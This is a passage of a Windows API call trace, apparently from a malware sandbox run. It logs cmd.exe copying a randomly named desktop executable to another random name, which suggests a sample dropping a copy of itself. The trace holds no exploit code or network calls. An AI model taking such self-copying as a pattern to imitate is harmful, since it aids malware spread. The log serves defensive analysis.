phkResult=0x10ded10*=0x94) returned 0x0 [0076.455] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x58, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x1, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x1, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x0, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x40, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x40, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x40, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegCloseKey (hKey=0x94) returned 0x0 [0076.456] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x10ded10 | out: phkResult=0x10ded10*=0x94) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x40, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x1, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x1, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x0, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x9, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x4, lpData=0x10ded1c*=0x9, lpcbData=0x10ded18*=0x4) returned 0x0 [0076.456] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x10ded14, lpData=0x10ded1c, lpcbData=0x10ded18*=0x1000 | out: lpType=0x10ded14*=0x0, lpData=0x10ded1c*=0x9, lpcbData=0x10ded18*=0x1000) returned 0x2 [0076.456] RegCloseKey (hKey=0x94) returned 0x0 [0076.456] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb431d5 [0076.456] srand (_Seed=0x5bb431d5) [0076.457] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\"" [0076.457] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\"" [0076.457] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0076.457] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x55f7ed0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.457] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0076.457] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.457] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.457] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.457] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.457] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.457] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.457] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.457] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.457] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.457] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.458] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.458] GetEnvironmentStringsW () returned 0x55f80e0* [0076.458] FreeEnvironmentStringsA (penv="A") returned 1 [0076.458] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.458] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.458] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.458] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.458] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.458] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.458] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.458] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.459] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.459] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x10dfae8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0076.459] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x10dfae8, lpFilePart=0x10dfae0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x10dfae0*="Desktop") returned 0x1d [0076.459] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0076.459] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x10df868 | out: lpFindFileData=0x10df868) returned 0x55f05c8 [0076.459] FindClose (in: hFindFile=0x55f05c8 | out: hFindFile=0x55f05c8) returned 1 [0076.459] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x10df868 | out: lpFindFileData=0x10df868) returned 0x55f05c8 [0076.460] FindClose (in: hFindFile=0x55f05c8 | out: hFindFile=0x55f05c8) returned 1 [0076.460] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0076.460] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x10df868 | out: lpFindFileData=0x10df868) returned 0x55f05c8 [0076.460] FindClose (in: hFindFile=0x55f05c8 | out: hFindFile=0x55f05c8) returned 1 [0076.460] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0076.460] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0076.460] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0076.460] GetEnvironmentStringsW () returned 0x55f80e0* [0076.460] FreeEnvironmentStringsA (penv="=") returned 1 [0076.460] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0076.461] GetConsoleOutputCP () returned 0x1b5 [0076.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0076.465] GetUserDefaultLCID () returned 0x409 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x10dfc18, cchData=128 | out: lpLCData="0") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x10dfc18, cchData=128 | out: lpLCData="0") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x10dfc18, cchData=128 | out: lpLCData="1") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0076.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0076.467] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.468] GetConsoleTitleW (in: lpConsoleTitle=0x55fa9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.471] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0076.471] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0076.471] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0076.471] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0076.472] _wcsicmp (_String1="copy", _String2=")") returned 58 [0076.472] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0076.472] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0076.472] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0076.472] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0076.472] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0076.472] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0076.475] GetConsoleTitleW (in: lpConsoleTitle=0x10df900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.476] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0076.476] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0076.476] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0076.476] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0076.476] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0076.477] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0076.478] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0076.479] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0076.480] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0076.481] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0076.482] _wcsnicmp (_String1="/V", _String2="/Y", _MaxCount=0x2) returned -3 [0076.482] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0076.483] _wcsicmp (_String1="CURRENT_DIRnwovkcyl.exe", _String2=".") returned 53 [0076.483] _wcsicmp (_String1="CURRENT_DIRnwovkcyl.exe", _String2="..") returned 53 [0076.483] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x20 [0076.483] _wcsicmp (_String1="NWYpDmnO.exe", _String2=".") returned 64 [0076.483] _wcsicmp (_String1="NWYpDmnO.exe", _String2="..") returned 64 [0076.483] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x10df8ac, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x10df8ac, ReturnLength=0x0) returned 0x0 [0076.483] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x10df8b0, ProcessInformationLength=0x4) returned 0x0 [0076.483] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1210000 [0076.484] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1220000 [0076.484] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", fInfoLevelId=0x1, lpFindFileData=0x55fb0c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x55fb0c8) returned 0x55f90e8 [0076.484] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", nBufferLength=0x104, lpBuffer=0x10debc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", lpFilePart=0x0) returned 0x2a [0076.484] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", _String2="con") returned -53 [0076.484] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10dedcc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa4 [0076.484] _open_osfhandle (_OSFileHandle=0xa4, _Flags=8) returned 3 [0076.485] _get_osfhandle (_FileHandle=3) returned 0xa4 [0076.485] GetFileType (hFile=0xa4) returned 0x1 [0076.485] SetErrorMode (uMode=0x0) returned 0x0 [0076.485] SetErrorMode (uMode=0x1) returned 0x0 [0076.485] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", nBufferLength=0x208, lpBuffer=0x10df278, lpFilePart=0x10deddc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", lpFilePart=0x10deddc*="CURRENT_DIRnwovkcyl.exe") returned 0x35 [0076.485] SetErrorMode (uMode=0x0) returned 0x1 [0076.485] _get_osfhandle (_FileHandle=3) returned 0xa4 [0076.485] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0x200, lpOverlapped=0x0) returned 1 [0076.486] SetErrorMode (uMode=0x0) returned 0x0 [0076.486] SetErrorMode (uMode=0x1) returned 0x0 [0076.486] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", nBufferLength=0x208, lpBuffer=0x10de9c8, lpFilePart=0x10de9ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", lpFilePart=0x10de9ac*="NWYpDmnO.exe") returned 0x2a [0076.486] SetErrorMode (uMode=0x0) returned 0x1 [0076.486] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", _String2="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe") returned -11 [0076.486] _wcsicmp (_String1="NWYpDmnO.exe", _String2=".") returned 64 [0076.486] _wcsicmp (_String1="NWYpDmnO.exe", _String2="..") returned 64 [0076.486] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0xffffffff [0076.486] GetLastError () returned 0x2 [0076.486] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", nBufferLength=0x104, lpBuffer=0x10debc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", lpFilePart=0x0) returned 0x2a [0076.487] SetErrorMode (uMode=0x0) returned 0x0 [0076.487] SetErrorMode (uMode=0x1) returned 0x0 [0076.487] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", nBufferLength=0x208, lpBuffer=0x10de9c8, lpFilePart=0x10de9ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", lpFilePart=0x10de9ac*="NWYpDmnO.exe") returned 0x2a [0076.487] SetErrorMode (uMode=0x0) returned 0x1 [0076.487] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", _String2="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe") returned -11 [0076.487] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0xffffffff [0076.487] CopyFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x13fe440, dwCopyFlags=0x0) returned 1 [0078.138] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 